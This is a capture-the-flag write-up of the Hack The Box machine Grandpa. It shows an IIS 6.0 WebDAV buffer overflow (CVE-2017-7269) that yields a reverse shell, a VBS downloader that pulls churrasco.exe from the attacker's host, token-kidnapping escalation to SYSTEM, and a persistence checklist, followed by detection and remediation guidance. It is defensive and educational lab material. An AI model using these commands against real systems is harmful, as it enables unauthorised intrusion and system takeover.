Skip to content
Back to all posts

HTB: Grandpa

· 14 min easy Windows Grandpa

A buffer overflow in IIS 6.0's WebDAV handler delivers code execution on Windows Server 2003, and token kidnapping completes the escalation to SYSTEM.

#htb #iis #webdav #windows #token-impersonation #cve-2017-7269

Overview

Grandpa is an Easy-rated Windows machine running Microsoft IIS 6.0 on Windows Server 2003 SP2. Port 80 is the only open port, serving the default “Under Construction” page with WebDAV enabled. No custom application is deployed; the entire attack surface is the WebDAV interface itself.

The attack chain has two stages. CVE-2017-7269, a stack buffer overflow in the ScStoragePathFromUrl function of the WebDAV PROPFIND handler, provides unauthenticated code execution as NT AUTHORITY\NETWORK SERVICE. From there, the SeImpersonatePrivilege held by the service account enables MS09-012 token kidnapping via churrasco.exe, escalating to NT AUTHORITY\SYSTEM.

The buffer overflow exploit is inherently unreliable. It succeeded on the first attempt against a fresh instance but corrupted the IIS worker process after multiple retries, requiring a box reset. Operational discipline matters here: one clean attempt, not fifteen.

Reconnaissance

I start with a service scan to identify what is listening:

nmap -sC -sV -A -T4 10.129.16.93
PortServiceProduct / VersionNotes
80HTTPMicrosoft IIS httpd 6.0WebDAV enabled, default page served

Only one port open. The remaining 999 scanned ports are filtered, indicating a host firewall. The OS detection places this on Windows Server 2003 SP2 (5.2.3790).

Nmap’s WebDAV scan reveals the full HTTP method list. PUT and DELETE appear in the public options but return 403 Forbidden when tested. PROPFIND returns 207 Multi-Status: the read path through WebDAV is accessible.

curl -sI http://10.129.16.93/
# Server: Microsoft-IIS/6.0
# MicrosoftOfficeWebServer: 5.0_Pub
# X-Powered-By: ASP.NET

The MicrosoftOfficeWebServer: 5.0_Pub header confirms WebDAV publishing extensions are active. The Last-Modified date of February 2003 confirms the default page has not been touched since OS installation.

Attack Surface Analysis

With only port 80 and no custom application, the attack surface is the IIS 6.0 WebDAV service. Write methods (PUT, DELETE) are blocked with 403 responses. PROPFIND is accessible without authentication. This narrows the search to vulnerabilities in the PROPFIND handler itself.

IIS 6.0 on Server 2003 has a substantial CVE history. The key candidate is CVE-2017-7269: a buffer overflow in ScStoragePathFromUrl triggered by a crafted If header in PROPFIND requests.

AttributeValue
CVECVE-2017-7269
CVSS v3.19.8 (Critical)
CWECWE-119 (Buffer Overflow)
Root causeStack buffer overflow in ScStoragePathFromUrl parsing the PROPFIND If header
AffectedIIS 6.0 with WebDAV enabled
Fixed inNever patched (Server 2003 EOL July 2015; CVE disclosed March 2017)
MITRE ATT&CKT1190 (Exploit Public-Facing Application)

Microsoft never issued a patch. Windows Server 2003 reached end-of-life two years before this CVE was even disclosed. No KB article exists.

Vulnerability Analysis

The ScStoragePathFromUrl function converts URL paths from PROPFIND If headers into local storage paths using a fixed-size stack buffer. Specially crafted Unicode characters in long http:// URLs overflow this buffer, overwriting the return address and redirecting execution to attacker-controlled shellcode embedded in the same request.

The vulnerability exists in httpext.dll. The PROPFIND handler processes the If header before any authentication check, making this effectively unauthenticated.

Exploitation

I use the g0rx proof-of-concept (converted to Python 3) which constructs the malicious PROPFIND request with embedded reverse shell shellcode:

# Start listener
nc -lvnp 4444

# Send exploit
python3 exploit_grandpa.py 10.129.16.93 80 10.10.14.5 4444
connect to [10.10.14.5] from (UNKNOWN) [10.129.16.93] 1030
Microsoft Windows [Version 5.2.3790]

C:\WINDOWS\system32>whoami
nt authority\network service

The shell lands as NETWORK SERVICE. This account cannot read user profiles directly, but it holds SeImpersonatePrivilege, which is the key to escalation.

Privilege Escalation: MS09-012 Token Kidnapping

I confirm the privilege:

whoami /priv
# SeImpersonatePrivilege        Impersonate a client after authentication   Enabled

Windows Server 2003 lacks modern file transfer tools (certutil -urlcache, bitsadmin, PowerShell are all absent). I write a VBS downloader using Microsoft.XMLHTTP and ADODB.Stream to transfer churrasco.exe:

# On target: write VBS downloader line by line
echo Set o=CreateObject("Microsoft.XMLHTTP") > d.vbs
echo o.Open "GET","http://10.10.14.5:8888/churrasco.exe",False >> d.vbs
echo o.Send >> d.vbs
echo Set s=CreateObject("ADODB.Stream") >> d.vbs
echo s.Open >> d.vbs
echo s.Type=1 >> d.vbs
echo s.Write o.ResponseBody >> d.vbs
echo s.SaveToFile "C:\WINDOWS\Temp\c.exe",2 >> d.vbs
echo s.Close >> d.vbs
cscript d.vbs

Churrasco exploits MS09-012 to impersonate the SYSTEM token. Paths with spaces require 8.3 short filenames:

C:\WINDOWS\Temp>c.exe "type DOCUME~1\Harry\Desktop\user.txt"
[flag redacted]

C:\WINDOWS\Temp>c.exe "type DOCUME~1\ADMINI~1\Desktop\root.txt"
[flag redacted]

Post-Exploitation

Full SYSTEM access via churrasco. Both flags captured. The system confirms as Windows Server 2003 SP2:

systeminfo | findstr /B /C:"OS"
# OS Name:                   Microsoft Windows Server 2003 R2 Standard Edition
# OS Version:                5.2.3790 Service Pack 2 Build 3790

whoami
# nt authority\system

Two user profiles exist: Harry and Administrator. In a production environment, the post-exploitation checklist would include:

  • SAM database extraction: Dump password hashes from the registry for offline cracking
  • Cached domain credentials: Check for domain-joined status and cached logon hashes
  • Network reconnaissance: Identify internal subnets reachable from this host
  • Persistence: Create a new local administrator account, install a service backdoor, or inject an SSH public key

The VBS downloader technique is worth noting for legacy Windows environments where modern LOLBins are unavailable. The Microsoft.XMLHTTP and ADODB.Stream COM objects exist on every Windows installation from 2000 onward. Defenders monitoring for these objects being instantiated by cscript.exe or wscript.exe can detect this file transfer method.

Defensive Analysis

Detection opportunities

PhaseMITRE ATT&CKDetection
Initial accessT1190IDS signature for oversized If headers in PROPFIND requests
ExecutionT1059Process monitoring: cmd.exe spawned by w3wp.exe
Priv escalationT1134.001Token impersonation: new process with SYSTEM token from NETWORK SERVICE
Defence evasionT1027VBS script creation in C:\WINDOWS\Temp

Network-level: The PROPFIND request carrying the overflow payload is distinctive. The If header contains several kilobytes of encoded data that no legitimate WebDAV client would produce. Snort/Suricata rules matching oversized PROPFIND headers would catch this.

Host-level: Any process monitoring tool would flag cmd.exe spawned as a child of w3wp.exe. The churrasco token impersonation creates a process with a SYSTEM token from a NETWORK SERVICE parent, which is another high-fidelity detection.

Remediation

PriorityActionEffortImpact
P0Decommission Windows Server 2003HighCritical
P0If decommission is impossible, isolate the host on a dedicated VLAN with strict ACLsMediumCritical
P1Disable WebDAV if not requiredLowHigh
P1Remove SeImpersonatePrivilege from service accounts where impersonation is not neededLowHigh
P2Deploy network IDS with WebDAV protocol inspectionMediumMedium
P3Implement application whitelisting to prevent execution of uploaded binariesMediumMedium

The core issue is the operating system. Server 2003 has been unsupported since July 2015. Every component on this host is frozen at mid-2000s patch levels. The correct remediation is decommissioning, not patching.

Key Takeaways

  1. End-of-life software creates unpatchable vulnerabilities. CVE-2017-7269 was disclosed two years after Server 2003 went EOL. No fix was ever released. Organisations running EOL systems accept the risk of zero-day vulnerabilities with no vendor response.

  2. Token impersonation is a reliable escalation path on Windows. Any service account with SeImpersonatePrivilege (NETWORK SERVICE, LOCAL SERVICE) on unpatched Windows can escalate to SYSTEM. The Potato family of tools (and churrasco for older systems) makes this trivial. Defenders should audit which accounts hold this privilege.

  3. Legacy environments require creative tooling. Without PowerShell, certutil, or bitsadmin, file transfer on Server 2003 falls back to VBS COM objects. Attackers adapt; defenders should anticipate these techniques when monitoring legacy systems.